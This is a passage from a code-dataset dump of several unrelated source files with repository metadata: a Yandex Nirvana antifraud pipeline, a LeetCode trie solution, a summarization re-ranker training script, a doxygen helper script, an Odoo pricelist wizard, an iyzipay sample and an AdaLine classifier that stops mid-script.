arcadia_revision: 
vh3.Integer = None,\n    checkout_arcadia_from_url: vh3.String = None,\n    kill_timeout: vh3.Integer = None,\n    sandbox_requirements_disk: vh3.Integer = None,\n    sandbox_requirements_ram: vh3.Integer = None,\n    cache: vh3.String = None,\n    build_type: vh3.Enum[\n        typing.Literal[\"release\", \"debug\", \"profile\", \"coverage\",\n                       \"relwithdebinfo\", \"valgrind\", \"valgrind-release\"]\n    ] = \"release\",\n    host_platform: vh3.String = None,\n    target_platform: vh3.String = None,\n    clear_build: vh3.Boolean = False,\n    sanitize: vh3.Enum[typing.Literal[\"undefined\",\n                                      \"address\", \"memory\", \"thread\"]] = None,\n    compress_package_archive: vh3.Boolean = True,\n    owner: vh3.String = None,\n    timestamp: vh3.Date = None,\n    build_system: vh3.Enum[typing.Literal[\"ya\",\n                                          \"ya_force\", \"semi_distbuild\", \"distbuild\"]] = \"ya\",\n    ya_yt_token_vault_owner: vh3.String = None,\n    ya_yt_token_vault_name: vh3.String = None,\n    sync: typing.Union[\n        vh3.Binary,\n        vh3.Executable,\n        vh3.FMLDumpParse,\n        vh3.FMLFormula,\n        vh3.FMLFormulaSerpPrefs,\n        vh3.FMLPool,\n        vh3.FMLPrs,\n        vh3.FMLSerpComparison,\n        vh3.FMLWizards,\n        vh3.File,\n        vh3.HTML,\n        vh3.HiveTable,\n        vh3.Image,\n        vh3.JSON,\n        vh3.MRDirectory,\n        vh3.MRFile,\n        vh3.MRTable,\n        vh3.TSV,\n        vh3.Text,\n        vh3.XML,\n    ] = None\n) -> vh3.Binary:\n    \"\"\"\n    YA_PACKAGE\n\n    **Operation purpose**\n\n    Creates an archive from Arcadia files using the YA_PACKAGE Sandbox task.\n\n    **Inputs**\n\n    - \"sync\" - any data; used to synchronize execution with other operations.\n\n    **Outputs**\n\n    - \"YA_PACKAGE\" - an archive (binary file).\n\n\n    **Limitations**\n\n    None.\n\n    :param timestamp:\n    :param sync:\n    :param packages: Package paths relative to arcadia, `;` separated\n    :param package_type: Package type: debian or tarball\n    :param use_new_format: New ya package json format\n      [[ya package --new]]\n    :param strip_binaries: Strip debug information\n    :param resource_type: Created resource type\n    :param arcadia_patch: Apply patch (diff file rbtorrent, paste.y-t.ru link or plain text).\n    :param use_aapi_fuse: Use arcadia-api fuse\n    :param use_arc_instead_of_aapi: Use arc fuse instead of aapi\n    :param aapi_fallback: Fallback to svn/hg if AAPI services are temporary unavailable\n    :param run_tests: Run tests after build\n    :param checkout: Run ya make with --checkout\n    :param use_ya_dev: Use ya-dev to build\n    :param sandbox_oauth_token: OAuth token secret\n    :param arcadia_url: Arcadia base URL\n    :param arcadia_revision: Arcadia revision\n    :param checkout_arcadia_from_url: Full SVN url for arcadia (Overwrites base URL and revision, use @revision to fix revision)\n    :param kill_timeout: Kill Timeout (seconds)\n    :param sandbox_requirements_disk: Disk requirements in Mb\n    :param sandbox_requirements_ram: RAM requirements in Mb\n    :param cache: Force cache invalidation\n    :param build_type: Build type\n    :param host_platform: Host platform\n    :param target_platform: Target platform\n    :param clear_build: Clear build\n    :param sanitize: Build with sanitizer\n    :param compress_package_archive: Compress package archive\n    :param owner:\n        Owner of sandbox task\n    :param build_system: Build system\n    :param ya_yt_token_vault_owner: YT token vault owner\n    :param ya_yt_token_vault_name: YT token vault name\n    \"\"\"\n    raise NotImplementedError(\"Write your local execution stub here\")\n\n\nclass BuildArcadiaProjectOutput(typing.NamedTuple):\n    arcadia_project: vh3.Executable\n    sandbox_task_id: 
vh3.Text\n\n\n@vh3.decorator.external_operation(\"https://nirvana.yandex-team.ru/operation/dd4b5735-1ee7-497d-91fc-b81ba8b510fc\")\n@vh3.decorator.nirvana_output_names(arcadia_project=\"ARCADIA_PROJECT\", sandbox_task_id=\"SANDBOX_TASK_ID\")\ndef build_arcadia_project(\n    *,\n    targets: vh3.String,\n    arts: vh3.String,\n    arcadia_url: vh3.String = \"arcadia:/arc/trunk/arcadia\",\n    arcadia_revision: vh3.Integer = None,\n    checkout_arcadia_from_url: vh3.String = None,\n    build_type: vh3.Enum[\n        typing.Literal[\"release\", \"debug\", \"profile\", \"coverage\",\n                       \"relwithdebinfo\", \"valgrind\", \"valgrind-release\"]\n    ] = \"release\",\n    arts_source: vh3.String = None,\n    result_single_file: vh3.Boolean = False,\n    definition_flags: vh3.String = None,\n    sandbox_oauth_token: vh3.Secret = None,\n    arcadia_patch: vh3.String = None,\n    owner: vh3.String = None,\n    use_aapi_fuse: vh3.Boolean = True,\n    use_arc_instead_of_aapi: vh3.Boolean = True,\n    aapi_fallback: vh3.Boolean = False,\n    kill_timeout: vh3.Integer = None,\n    sandbox_requirements_disk: vh3.Integer = None,\n    sandbox_requirements_ram: vh3.Integer = None,\n    sandbox_requirements_platform: vh3.Enum[\n        typing.Literal[\n            \"Any\",\n            \"darwin-20.4.0-x86_64-i386-64bit\",\n            \"linux\",\n            \"linux_ubuntu_10.04_lucid\",\n            \"linux_ubuntu_12.04_precise\",\n            \"linux_ubuntu_14.04_trusty\",\n            \"linux_ubuntu_16.04_xenial\",\n            \"linux_ubuntu_18.04_bionic\",\n            \"osx\",\n            \"osx_10.12_sierra\",\n            \"osx_10.13_high_sierra\",\n            \"osx_10.14_mojave\",\n            \"osx_10.15_catalina\",\n            \"osx_10.16_big_sur\",\n        ]\n    ] = None,\n    checkout: vh3.Boolean = False,\n    clear_build: vh3.Boolean = True,\n    strip_binaries: vh3.Boolean = False,\n    lto: vh3.Boolean = False,\n    thinlto: vh3.Boolean = False,\n    musl: vh3.Boolean = False,\n    use_system_python: vh3.Boolean = False,\n    target_platform_flags: vh3.String = None,\n    javac_options: vh3.String = None,\n    ya_yt_proxy: vh3.String = None,\n    ya_yt_dir: vh3.String = None,\n    ya_yt_token_vault_owner: vh3.String = None,\n    ya_yt_token_vault_name: vh3.String = None,\n    result_rt: vh3.String = None,\n    timestamp: vh3.Date = None,\n    build_system: vh3.Enum[typing.Literal[\"ya\",\n                                          \"ya_force\", \"semi_distbuild\", \"distbuild\"]] = \"ya\"\n) -> BuildArcadiaProjectOutput:\n    \"\"\"\n    Build Arcadia Project\n\n    Launches YA_MAKE task in Sandbox for provided target and downloads requested artifact.\n\n    :param targets: Target\n      [[Multiple targets with \";\" are not allowed]]\n    :param arts: Build artifact\n      [[Multiple artifacts with \";\" and custom destination directory with \"=\" are not allowed]]\n    :param arcadia_url: Svn url for arcadia\n      [[Should not contain revision]]\n    :param arcadia_revision: Arcadia Revision\n    :param checkout_arcadia_from_url: Full SVN url for arcadia (Overwrites base URL and revision, use @revision to fix revision)\n    :param build_type: Build type\n    :param arts_source: Source artifacts (semicolon separated pairs path[=destdir])\n      [[Which files from Arcadia to put into a separate resource (same format as build artifacts)]]\n    :param result_single_file: Result is a single file\n    :param definition_flags: Definition flags\n      [[For example \"-Dkey1=val1 ... -DkeyN=valN\"]]\n    :param sandbox_oauth_token: Sandbox OAuth token\n      [[To run task on behalf of specific user]]\n      Name of the secret containing oauth token of user the sandbox task should be launched from\n    :param arcadia_patch: Apply patch\n      [[Diff file rbtorrent, paste.y-t.ru link or plain text. 
Doc: https://nda.ya.ru/3QTTV4]]\n :param owner: Custom sandbox task owner (should be used only with OAuth token)\n [[OAuth token owner should be a member of sandbox group]]\n :param use_aapi_fuse: Use arcadia-api fuse\n :param use_arc_instead_of_aapi: Use arc fuse instead of aapi\n :param aapi_fallback: Fallback to svn/hg if AAPI services are temporary unavailable\n :param kill_timeout: Kill Timeout (seconds)\n :param sandbox_requirements_disk: Disk requirements in Mb\n :param sandbox_requirements_ram: RAM requirements in Mb\n :param sandbox_requirements_platform: Platform\n :param checkout: Run ya make with --checkout\n :param clear_build: Clear build\n :param strip_binaries: Strip result binaries\n :param lto: Build with LTO\n :param thinlto: Build with ThinLTO\n :param musl: Build with musl-libc\n :param use_system_python: Use system Python to build python libraries\n :param target_platform_flags: Target platform flags (only for cross-compilation)\n :param javac_options: Javac options (semicolon separated)\n :param ya_yt_proxy: YT store proxy\n :param ya_yt_dir: YT store cypress path\n :param ya_yt_token_vault_owner: YT token vault owner\n :param ya_yt_token_vault_name: YT token vault name\n :param result_rt: Result resource type\n :param timestamp: Timestamp\n :param build_system: Build System\n \"\"\"\n raise NotImplementedError(\"Write your local execution stub here\")\n\n\n@vh3.decorator.external_operation(\"https://nirvana.yandex-team.ru/operation/f42eeefa-4f48-43cc-9472-47a9c8c7ced3\")\n@vh3.decorator.nirvana_names_transformer(vh3.name_transformers.snake_to_dash, options=True)\ndef antifraud_update_collapsed_aggrs(\n *,\n yt_token: vh3.Secret,\n batch_size: vh3.Integer,\n timeout_sec: vh3.Integer,\n host: vh3.String,\n retry_delay_sec: vh3.Number,\n retries: vh3.Integer,\n exe: vh3.Executable,\n src: vh3.MRTable,\n mr_default_cluster: vh3.Enum[\n typing.Literal[\n \"hahn\",\n \"freud\",\n \"marx\",\n \"hume\",\n \"arnold\",\n \"markov\",\n \"bohr\",\n \"landau\",\n \"seneca-vla\",\n \"seneca-sas\",\n \"seneca-man\",\n ]\n ] = \"arnold\"\n) -> None:\n \"\"\"\n Antifraud update collapsed aggrs\n\n :param yt_token: YT Token:\n [[ID of Nirvana Secret with YT access token (https://nda.ya.ru/3RSzVU).\n Guide to Nirvana Secrets: https://nda.ya.ru/3RSzWZ]]\n YT OAuth Token.\n\n [Obtain access token](https://nda.ya.ru/3RSzVU), then [create a Nirvana secret](https://nda.ya.ru/3RSzWZ) and [use it here](https://nda.ya.ru/3RSzWb).\n You can [share the secret](https://nda.ya.ru/3RSzWd) with user(s) and/or a staff group.\n :param mr_default_cluster: Default YT cluster:\n [[Default YT cluster]]\n \"\"\"\n raise NotImplementedError(\"Write your local execution stub here\")\n\n\nYQL_JOIN = \"\"\"PRAGMA yson.DisableStrict;\nPRAGMA yson.AutoConvert;\nPRAGMA yt.InferSchema = '1';\nPRAGMA yt.Pool = \"processing-mail-so\";\nPRAGMA AnsiInForEmptyOrNullableItemsCollections;\n\n$source = (\n SELECT Yson::LookupString(nsrc, \"txn_extid\") as id,\n Yson::LookupString(nsrc, \"transaction_type\") as transaction_type,\n channel_uri,\n storage_service,\n nsrc,\n request,\n rbl,\n lua_resolution,\n queues\n FROM {{input1}}\n);\n\n$scores = (SELECT * FROM $source WHERE request = \"score\" AND transaction_type in (\"BINDING\", \"COMMON_PAYMENT\", \"AUTH\"));\n$saves = (SELECT * FROM $source WHERE request = \"save\");\n\nINSERT INTO {{output1}}\nSELECT\n scores.id as id,\n scores.channel_uri as channel_uri,\n scores.storage_service as storage_service,\n scores.rbl as rbl,\n scores.nsrc as score_data,\n 
scores.lua_resolution as lua_resolution,\n    scores.queues as queues,\n    saves.nsrc as save_data\nFROM $scores AS scores\nLEFT JOIN $saves AS saves\nUSING(id);\"\"\"\n\nMR_ACCOUNT = \"so_fml\"\nYT_TOKEN = \"luckybug_nirvana_token\"\nYQL_TOKEN = \"luckybug_yql_token\"\n\n\n@vh3.decorator.graph()\ndef collapse_daily_aggregates() -> None:\n    src = get_mr_table(\n        table=\"//logs/mail-so-antifraud-log/1d/2022-03-30\", cluster=\"arnold\")\n\n    joined = yql_1(input1=[src], request=YQL_JOIN, yt_token=YT_TOKEN,\n                   yql_token=YQL_TOKEN, mr_account=MR_ACCOUNT)\n\n    runner = ya_package(\n        packages=\"mail/so/daemons/antifraud/antifraud_runner/package.json\", arcadia_revision=9301950)\n\n    updater = build_arcadia_project(targets=\"mail/so/daemons/antifraud/nirvana/update_collapsed_aggrs\",\n                                    arts=\"mail/so/daemons/antifraud/nirvana/update_collapsed_aggrs/update_collapsed_aggrs\",\n                                    arcadia_revision=9301950)\n\n    aggrs = antifraud_runner(\n        bundle_tar_gz=runner, src=joined.output1, yt_token=YT_TOKEN, mr_account=MR_ACCOUNT)\n\n    return antifraud_update_collapsed_aggrs(exe=updater.arcadia_project,\n                                            src=aggrs,\n                                            yt_token=YT_TOKEN,\n                                            batch_size=1000,\n                                            timeout_sec=10,\n                                            retries=10,\n                                            retry_delay_sec=0.5,\n                                            host=\"http://so-fraud-producer.pers.yandex.net\")\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/test_vh/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":27807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28375999615","text":"from typing import List\n\nclass TrieNode:\n    def __init__(self):\n        self.next = {}\n        self.is_word = False\n    \n\nclass StreamChecker:\n\n    def __init__(self, words: List[str]):\n        self.s = ''\n        self.root = TrieNode()\n        \n        for word in words:\n            self.insert(word[::-1])\n        \n\n    def query(self, letter: str) -> bool:\n        self.s = letter + self.s\n        node = self.root\n        for ch in self.s:\n            if ch not in node.next:\n                return False\n            node = node.next[ch]\n            if node and node.is_word:\n                return True\n        return False\n    \n    \n    def insert(self, word):\n        node = self.root\n        for ch in word:\n            node = node.next.setdefault(ch, TrieNode())\n        node.is_word = True\n\n\n# Your StreamChecker object will be instantiated and called as such:\n# obj = StreamChecker(words)\n# param_1 = obj.query(letter)","repo_name":"dreamjean/LeetCode-JavaScript","sub_path":"1032-stream-of-characters/1032-stream-of-characters.py","file_name":"1032-stream-of-characters.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4757118955","text":"import os\nos.environ['TOKENIZERS_PARALLELISM'] = 'false'\nos.environ['ROUGE_HOME'] = os.path.expanduser('~/faith-sum/eval/ROUGE-1.5.5/')\n\nimport argparse\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import LearningRateMonitor, ModelCheckpoint\nfrom pytorch_lightning import loggers as pl_loggers\nfrom pytorch_lightning.plugins import DDPPlugin\nimport torch\nfrom transformers import AutoTokenizer\n\nfrom global_utils import get_free_gpus, set_same_seed\nfrom rank.dataset import RankDataModule\nfrom rank.model import SummaryRanker\n\n\ndef build_tokenizer(max_num_sents=200):\n    tokenizer = AutoTokenizer.from_pretrained('roberta-base')\n    add_tokens = [f'<s{i}>' for i in range(max_num_sents)]  # per-sentence special tokens: '<s0>', '<s1>', ...\n    special_tokens_dict = {'additional_special_tokens': add_tokens}\n    tokenizer.add_special_tokens(special_tokens_dict)\n    return tokenizer\n\n\ndef run(args):\n    if args.gpu_device is not None:\n        gpus = [args.gpu_device]\n    else:\n        gpus 
= get_free_gpus() if torch.cuda.is_available() and not args.cpu else None\n assert gpus is None or len(gpus) > 0\n if gpus is not None and (args.debug or args.find_lr):\n gpus = [gpus[0]]\n if gpus is not None and len(gpus) > args.max_gpus:\n gpus = gpus[:args.max_gpus]\n if gpus is not None:\n gpu_str = ','.join([str(x) for x in gpus])\n print(f'Using GPUS --> {gpu_str}...')\n\n args.num_gpus = None if gpus is None else len(gpus)\n print('Num GPUs --> {}'.format(args.num_gpus))\n precision = 16 if args.num_gpus is not None else 32\n experiment_dir = os.path.join(args.weight_dir, args.experiment, 'rank')\n os.makedirs(os.path.join(experiment_dir, 'wandb'), exist_ok=True) # Only way to make sure it's writable\n\n tokenizer = build_tokenizer(max_num_sents=args.max_num_sents)\n model = SummaryRanker(args, tokenizer)\n datamodule = RankDataModule(args, tokenizer=tokenizer)\n\n logger = pl_loggers.WandbLogger(\n name=args.experiment,\n save_dir=experiment_dir,\n offline=args.debug or args.offline,\n project='rerank',\n entity='griffinadams',\n )\n\n primary_eval_metric = 'val/score'\n primary_metric_mode = 'max' # Higher is better ('min' for val_loss)\n checkpoint_callback = ModelCheckpoint(\n monitor=primary_eval_metric,\n save_top_k=1,\n save_last=False,\n mode=primary_metric_mode\n )\n # early_stopping = EarlyStopping(primary_eval_metric, mode=primary_metric_mode, patience=5, verbose=True)\n callbacks = [checkpoint_callback]\n if not (args.no_schedule or args.debug or args.find_lr):\n lr_monitor = LearningRateMonitor(logging_interval='step')\n callbacks.append(lr_monitor)\n plugins = DDPPlugin(find_unused_parameters=False) if args.num_gpus is not None and args.num_gpus > 1 else None\n trainer = pl.Trainer.from_argparse_args(\n args,\n resume_from_checkpoint=args.restore_path,\n callbacks=callbacks,\n logger=logger,\n precision=precision,\n accelerator=None if args.num_gpus is None or args.num_gpus == 1 else 'ddp',\n gpus=gpus,\n default_root_dir=experiment_dir,\n gradient_clip_val=0.1,\n accumulate_grad_batches=args.grad_accum,\n val_check_interval=1.0 if args.debug else 0.1,\n num_sanity_val_steps=0 if args.debug else 2,\n log_every_n_steps=10,\n max_steps=args.max_steps,\n plugins=plugins,\n )\n\n if args.find_lr:\n lr_finder = trainer.tuner.lr_find(model, min_lr=1e-4, max_lr=1e-2, update_attr=True, num_training=100)\n print(lr_finder.results)\n else:\n print('Starting training...')\n trainer.fit(model, datamodule=datamodule)\n print(f'Best weights saved --> {checkpoint_callback.best_model_path}')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('Summarization Re-Ranker.')\n\n # Configuration Parameters\n parser.add_argument('-debug', default=False, action='store_true')\n parser.add_argument('--experiment', default='default')\n parser.add_argument('--dataset', default='cnn_dailymail')\n parser.add_argument('--restore_path', default=None)\n parser.add_argument('--seed', default=1992, type=int)\n parser.add_argument('--max_gpus', default=1, type=int)\n parser.add_argument('-cpu', default=False, action='store_true')\n parser.add_argument('--max_val_examples', default=1024, type=int)\n parser.add_argument('--gpu_device', default=None, type=int)\n parser.add_argument('--data_dir', default='/nlp/projects/faithsum')\n parser.add_argument('--gen_experiment', default='gen_extract_full_ar_mask_red_feat')\n parser.add_argument('-no_schedule', default=False, action='store_true')\n parser.add_argument('-offline', default=False, action='store_true')\n parser.add_argument('-find_lr', 
default=False, action='store_true')\n    # How many processes to use when loading batches on CPU\n    parser.add_argument('--num_dataloaders', default=8, type=int)\n    parser.add_argument('--summary_style', default='extract', choices=['extract', 'abstract', 'from_extract'])\n\n    # Hyper-parameters\n    parser.add_argument('--lr', type=float, default=1e-5)\n    parser.add_argument('--batch_size', type=int, default=2)\n    parser.add_argument('--grad_accum', type=int, default=4)\n    parser.add_argument('--warmup_steps', type=int, default=200)\n    parser.add_argument('--max_steps', default=100000, type=int)\n    parser.add_argument('--max_epochs', default=20, type=int)\n    parser.add_argument('--weight_decay', type=float, default=0)\n    parser.add_argument('--max_input_length', type=int, default=512)\n    parser.add_argument('--max_num_sents', type=int, default=200)\n\n    args = parser.parse_args()\n\n    args.weight_dir = os.path.join(args.data_dir, 'weights')\n    os.makedirs(args.weight_dir, exist_ok=True)\n\n    # Set same random seed for each run\n    set_same_seed(args.seed)\n    run(args)\n","repo_name":"griff4692/faith-sum","sub_path":"rank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"14818574469","text":"#!/usr/bin/env python3\n## @package process\n# Module doxygen.process\n# Script to insert preamble for doxygen and regen API docs\n\nimport os\nimport shutil\n\n\n# Module caffe2...caffe2.python.control_test\ndef insert(originalfile, first_line, description):\n    with open(originalfile) as f:\n        f1 = f.readline()\n        if f1.find(first_line) < 0:\n            docs = first_line + description + f1\n            with open(\"newfile.txt\", \"w\") as f2:\n                f2.write(docs)\n                f2.write(f.read())\n            os.rename(\"newfile.txt\", originalfile)\n        else:\n            print(\"already inserted\")\n\n\n# move up from /caffe2_root/doxygen\nos.chdir(\"..\")\nos.system(\"git checkout caffe2/contrib/.\")\nos.system(\"git checkout caffe2/distributed/.\")\nos.system(\"git checkout caffe2/experiments/.\")\nos.system(\"git checkout caffe2/python/.\")\n\nfor root, dirs, files in os.walk(\".\"):\n    for file in files:\n        if (\n            file.endswith(\".py\")\n            and not file.endswith(\"_test.py\")\n            and not file.endswith(\"__.py\")\n        ):\n            filepath = os.path.join(root, file)\n            print(\"filepath: \" + filepath)\n            directory = os.path.dirname(filepath)[2:]\n            directory = directory.replace(\"/\", \".\")\n            print(\"directory: \" + directory)\n            name = os.path.splitext(file)[0]\n            first_line = \"## @package \" + name\n            description = \"\\n# Module \" + directory + \".\" + name + \"\\n\"\n            print(first_line, description)\n            insert(filepath, first_line, description)\n\nif os.path.exists(\"doxygen/doxygen-python\"):\n    print(\"Looks like you ran this before, so we need to cleanup those old files...\")\n    shutil.rmtree(\"doxygen/doxygen-python\")\nelse:\n    os.makedirs(\"doxygen/doxygen-python\")\n\nif os.path.exists(\"doxygen/doxygen-c\"):\n    print(\"Looks like you ran this before, so we need to cleanup those old files...\")\n    shutil.rmtree(\"doxygen/doxygen-c\")\nelse:\n    os.makedirs(\"doxygen/doxygen-c\")\n\nos.system(\"doxygen .Doxyfile-python\")\nos.system(\"doxygen .Doxyfile-c\")\n","repo_name":"pytorch/pytorch","sub_path":"docs/caffe2/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"26940093572","text":"# Stack/Queue - Feature Development (기능 개발)\n\ndef solution(progresses, speeds):\n
count = 0\n answer = []\n while len(progresses) > 0:\n if progresses[0] >= 100:\n while len(progresses) > 0 and progresses[0] >= 100:\n progresses.pop(0)\n speeds.pop(0)\n count += 1\n answer.append(count)\n count = 0\n else:\n for j in range(len(progresses)):\n progresses[j] += speeds[j]\n\n return answer\n\n\nif __name__ == \"__main__\":\n aa, bb = input().strip('[]').split('], [')\n aa = list(map(int, aa.split(',')))\n bb = list(map(int, bb.split(',')))\n print(solution(aa, bb))","repo_name":"norzest/Python_basic","sub_path":"Programmers/고득점Kit/Stack&Queue2.py","file_name":"Stack&Queue2.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5262274061","text":"from odoo import api, fields, models\n\n\nclass PricelistSimulation(models.TransientModel):\n _name = \"wizard.preview.pricelist\"\n _description = \"wizard - Preview Pricelist\"\n\n @api.model\n def default_get(self, fields):\n vals = super().default_get(fields)\n if self.env.context.get(\"active_model\") == \"product.template\":\n vals[\"template_id\"] = self.env.context.get(\"active_id\")\n else:\n active_id = self.env.context.get(\"active_id\")\n product = self.env[\"product.product\"].browse(active_id)\n vals[\"product_id\"] = product.id\n vals[\"template_id\"] = product.product_tmpl_id.id\n return vals\n\n template_id = fields.Many2one(\n comodel_name=\"product.template\", string=\"Product Template\", readonly=True\n )\n product_id = fields.Many2one(\n comodel_name=\"product.product\",\n domain=\"[('product_tmpl_id', '=', template_id)]\",\n string=\"Product Variant\",\n )\n product_qty = fields.Float(string=\"Quantity\", default=1, required=True)\n price_date = fields.Date(\n string=\"Date\", default=fields.Date.context_today, required=True\n )\n line_ids = fields.One2many(\n string=\"Simulation Lines\",\n comodel_name=\"wizard.preview.pricelist.line\",\n inverse_name=\"simulation_id\",\n compute=\"_compute_line_ids\",\n )\n variant_count = fields.Integer(\n string=\"Variants Count\", compute=\"_compute_variant_count\"\n )\n\n @api.depends(\"template_id\", \"product_id\", \"product_qty\", \"price_date\")\n def _compute_line_ids(self):\n self.ensure_one()\n pricelists = self.env[\"product.pricelist\"].search(\n [(\"show_in_simulation\", \"=\", True)],\n )\n line_ids_vals = []\n for variant in self.product_id or self.template_id.product_variant_ids:\n for pricelist in pricelists:\n vals = self._prepare_simulation_lines_vals(variant, pricelist)\n line_ids_vals.append((0, False, vals))\n self.line_ids = line_ids_vals\n\n def _prepare_simulation_lines_vals(self, variant, pricelist):\n pricelist_id = pricelist.id\n price = pricelist._price_get(variant, self.product_qty)\n price = price[pricelist_id]\n return {\n \"product_id\": variant.id,\n \"pricelist_id\": pricelist.id,\n \"price\": price,\n }\n\n @api.depends(\"template_id\")\n def _compute_variant_count(self):\n self.ensure_one()\n self.variant_count = 1\n if not self.product_id:\n self.variant_count = len(self.template_id.product_variant_ids)\n\n\nclass PricelistSimulationLine(models.TransientModel):\n _name = \"wizard.preview.pricelist.line\"\n _description = \"wizard - Preview Pricelist Line\"\n\n simulation_id = fields.Many2one(\n string=\"Simulation\",\n comodel_name=\"wizard.preview.pricelist\",\n )\n product_id = fields.Many2one(\n comodel_name=\"product.product\",\n string=\"Product Variant\",\n readonly=True,\n )\n pricelist_id = fields.Many2one(\n 
comodel_name=\"product.pricelist\",\n string=\"Pricelist\",\n readonly=True,\n )\n currency_id = fields.Many2one(\n comodel_name=\"res.currency\",\n related=\"pricelist_id.currency_id\",\n string=\"Currency\",\n readonly=True,\n )\n price = fields.Monetary(\n string=\"Unit Price\",\n digits=\"Price\",\n readonly=True,\n currency_field=\"currency_id\",\n )\n","repo_name":"OCA/product-attribute","sub_path":"product_pricelist_simulation/wizards/wizard_preview_pricelist.py","file_name":"wizard_preview_pricelist.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","stars":163,"dataset":"github-code","pt":"72"} +{"seq_id":"206774043","text":"import re\nimport utils\n\n\nclass Colormap:\n def __init__(self, mapType, extras=False):\n self.mapType = mapType\n self.colors = {}\n with open(\"colormaps/{0}.txt\".format(mapType)) as f:\n for line in f.readlines():\n # self.count +=1\n simpleMatch = re.search(\n '([a-zA-Z0-9 \\'\\-\\(\\)\\[\\]]+)([0-9]+)? +(\\#[a-zA-Z0-9]{6})', line)\n extrasMatch = re.search(\n '([a-zA-Z \\(\\)]+) (\\#[a-zA-Z0-9]{6}) ([a-zA-Z0-9 \\*\\#]+)?', line)\n nbsMatch = re.search(\n '([a-zA-Z ]+) (\\#[0-9A-Z]{6}) (\\#[0-9A-Z]+) ([A-Za-z ]+) ?(\\*OUT)? ?(\\*IGNORE0)? ?(\\*\\#[0-9A-Z]+.+)?', line)\n\n if simpleMatch:\n name, num, hexVal = simpleMatch.groups()\n if num:\n name = name + num\n # If there are colors with the same hex but a different\n # name, combine their dictionary values instead of\n # replacing them\n if hexVal in self.colors.keys():\n self.colors[hexVal].append(name)\n else:\n self.colors[hexVal] = [name.strip()]\n # # elif extras and extrasMatch:\n # # name, hexVal, extra = extrasMatch.groups()\n # # self.colors[hexVal] = (name, extra)\n # # elif extras and nbsMatch:\n # # if \"OUT\" not in nbsMatch.groups():\n # # name, mundieHex, fosterHex, group = nbsMatch.groups()\n # # else:\n # # name, mundieHex, fosterHex, group, gamutException = nbsMatch.groups()\n # # if \"IGNORE0\" not in nbsMatch.groups():\n # # self.colors[mundieHex] = name\n # # self.colors[fosterHex] = name\n # # name, mundieHex, fosterHex, group, inGamut, = nbsMatch.groups()\n # else:\n # if not line.startswith(';'):\n # print \"X \", line\n\n def toRGB(self):\n \"\"\"Converts a Colormap\"\"\"\n newColors = {}\n for key, val in self.colors.items():\n if utils.validHex(key):\n key = utils.hex2rgb(key)\n newColors[key] = val\n self.colors = newColors\n return self\n\n def isMapType(self, requestedMapType):\n return self.mapType == requestedMapType\n","repo_name":"szellner/Polychrome","sub_path":"colormap.py","file_name":"colormap.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69969065832","text":"import iyzipay\n\noptions = {\n 'api_key': iyzipay.api_key,\n 'secret_key': iyzipay.secret_key,\n 'base_url': iyzipay.base_url\n}\n\nrequest = {\n 'locale': 'tr',\n 'conversationId': '123456789',\n 'binNumber': '554960'\n}\n\nbin_number = iyzipay.BinNumber().retrieve(request, options)\n\nprint(bin_number.read().decode('utf-8'))\n","repo_name":"iyzico/iyzipay-python","sub_path":"samples/retrieve_bin.py","file_name":"retrieve_bin.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"72"} +{"seq_id":"1905506444","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy.random import seed\n\n\n\n\nclass AdaLineGD(object):\n def 
__init__(self,eta = 0.01, n_iter = 30,shuffle = True, random_state=None):\n        self.eta = eta\n        self.n_iter = n_iter\n        self.shuffle = shuffle\n        self.w_inited = False\n        if random_state:\n            seed(random_state)\n\n    def net_input(self,X):\n        return np.dot(X, self._w[1:]) + self._w[0]\n\n    def _shuffle(self, X, y):\n        r = np.random.permutation(len(y))\n        return X[r],y[r]\n    def _init_weight(self, m):\n        self._w = np.zeros(m + 1)\n        self.w_inited = True\n    def _update_weight(self, xi, target):\n        output = self.net_input(xi)\n        error = target - output\n        self._w[1:] += self.eta * xi.dot(error)\n        self._w[0] += self.eta * error\n        cost = 0.5 * error ** 2\n        return cost\n    def fit(self, X, y):\n        self._init_weight(X.shape[1])\n        self.cost = []\n        for _ in range(self.n_iter):\n            if self.shuffle:\n                X, y = self._shuffle(X, y)\n            cost = []\n            for xi, target in zip(X, y):\n                cost.append(self._update_weight(xi, target))\n            avg_cost = sum(cost) / len(y)\n            self.cost.append(avg_cost)\n        return self\n\n    def partial_fit(self, X, y):\n        if not self.w_inited:\n            self._init_weight(X.shape[1])\n        if y.ravel().shape[0] > 1:\n            for xi, target in zip(X, y):\n                self._update_weight(xi, target)\n        else:\n            self._update_weight(X, y)\n        return self\n\n    def activation(self,X):\n        return self.net_input(X)\n\n    def predict(self,xi):\n        return np.where(self.activation(xi) >= 0.0,1,-1)\n\n\ndf = pd.read_csv('https://archive.ics.uci.edu/ml/'\n                 'machine-learning-databases/iris/iris.data', header = None)\n\ny = df.iloc[0:400,4].values\ny = np.where(y == 'Iris-setosa', -1, 1)\nX = df.iloc[0:400, [0,2]].values\n\nX_std = np.copy(X)\nX_std[:,0] = (X[:,0] - X[:,0].mean())/ X[:,0].std()\nX_std[:,1] = (X[:,1] - X[:,1].mean())/ X[:,1].std()\n\n\nfig, ax = plt.subplots(nrows =1, ncols = 1, figsize=(8,3))\n\nada1 = AdaLineGD(eta= 0.001).fit(X_std, 